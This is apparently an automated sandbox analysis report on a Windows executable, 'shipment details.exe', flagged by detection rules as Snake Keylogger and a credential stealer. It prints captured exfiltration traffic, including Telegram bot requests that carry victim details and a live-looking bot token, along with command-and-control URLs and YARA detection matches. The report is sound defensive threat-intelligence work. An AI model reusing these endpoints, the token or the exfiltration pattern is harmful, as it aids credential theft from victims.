Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 0133F45Dh |
1_2_0133F2C0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 0133F45Dh |
1_2_0133F4AC |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 0133FC19h |
1_2_0133F960 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BD31E0h |
1_2_06BD2DC8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BD0D0Dh |
1_2_06BD0B30 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BD1697h |
1_2_06BD0B30 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BD2C19h |
1_2_06BD2968 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDE959h |
1_2_06BDE6B0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDE0A9h |
1_2_06BDDE00 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDF209h |
1_2_06BDEF60 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDCF49h |
1_2_06BDCCA0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BD31E0h |
1_2_06BD2DC2 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDD7F9h |
1_2_06BDD550 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDE501h |
1_2_06BDE258 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDF661h |
1_2_06BDF3B8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDEDB1h |
1_2_06BDEB08 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDD3A1h |
1_2_06BDD0F8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDFAB9h |
1_2_06BDF810 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
1_2_06BD0040 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BDDC51h |
1_2_06BDD9A8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 4x nop then jmp 06BD31E0h |
1_2_06BD310E |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F44000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://api.telegram.org |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20a |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 0_2_00CFE5A4 |
0_2_00CFE5A4 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 0_2_00CFF498 |
0_2_00CFF498 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 0_2_05E08BC0 |
0_2_05E08BC0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_01337118 |
1_2_01337118 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133C147 |
1_2_0133C147 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133A088 |
1_2_0133A088 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_01335362 |
1_2_01335362 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133D278 |
1_2_0133D278 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133C468 |
1_2_0133C468 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133C738 |
1_2_0133C738 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_013369A0 |
1_2_013369A0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133E988 |
1_2_0133E988 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133CA08 |
1_2_0133CA08 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133CCD8 |
1_2_0133CCD8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133CFAA |
1_2_0133CFAA |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133E97A |
1_2_0133E97A |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_0133F960 |
1_2_0133F960 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_013339EE |
1_2_013339EE |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_013329EC |
1_2_013329EC |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_01333AA1 |
1_2_01333AA1 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_01333E09 |
1_2_01333E09 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD1E80 |
1_2_06BD1E80 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD17A0 |
1_2_06BD17A0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD9C70 |
1_2_06BD9C70 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDFC68 |
1_2_06BDFC68 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD9548 |
1_2_06BD9548 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD0B30 |
1_2_06BD0B30 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD5028 |
1_2_06BD5028 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD2968 |
1_2_06BD2968 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDE6B0 |
1_2_06BDE6B0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDE6AF |
1_2_06BDE6AF |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDDE00 |
1_2_06BDDE00 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD1E70 |
1_2_06BD1E70 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD178F |
1_2_06BD178F |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDEF60 |
1_2_06BDEF60 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDEF51 |
1_2_06BDEF51 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDCCA0 |
1_2_06BDCCA0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDCC8F |
1_2_06BDCC8F |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDDDFF |
1_2_06BDDDFF |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDD550 |
1_2_06BDD550 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDD540 |
1_2_06BDD540 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDEAF8 |
1_2_06BDEAF8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDE258 |
1_2_06BDE258 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDE24A |
1_2_06BDE24A |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDF3B8 |
1_2_06BDF3B8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD8BA0 |
1_2_06BD8BA0 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD8B91 |
1_2_06BD8B91 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD9BFB |
1_2_06BD9BFB |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD9328 |
1_2_06BD9328 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD0B20 |
1_2_06BD0B20 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDEB08 |
1_2_06BDEB08 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDD0F8 |
1_2_06BDD0F8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDD0E8 |
1_2_06BDD0E8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD5018 |
1_2_06BD5018 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDF810 |
1_2_06BDF810 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD0006 |
1_2_06BD0006 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDF802 |
1_2_06BDF802 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD0040 |
1_2_06BD0040 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDD9A8 |
1_2_06BDD9A8 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BDD999 |
1_2_06BDD999 |
Source: C:\Users\user\Desktop\shipment details.exe |
Code function: 1_2_06BD295A |
1_2_06BD295A |
Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe |
Source: shipment details.exe, 00000000.00000000.2051525359.000000000079A000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameShick.exe, vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4519226318.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameclr.dllT vs shipment details.exe |
Source: shipment details.exe, 00000001.00000002.4518256105.0000000000446000.00000040.00000400.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe |
Source: shipment details.exe, 00000001.00000002.4518425391.0000000000DC7000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameUNKNOWN_FILET vs shipment details.exe |
Source: shipment details.exe |
Binary or memory string: OriginalFilenameShick.exe, vs shipment details.exe |
Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
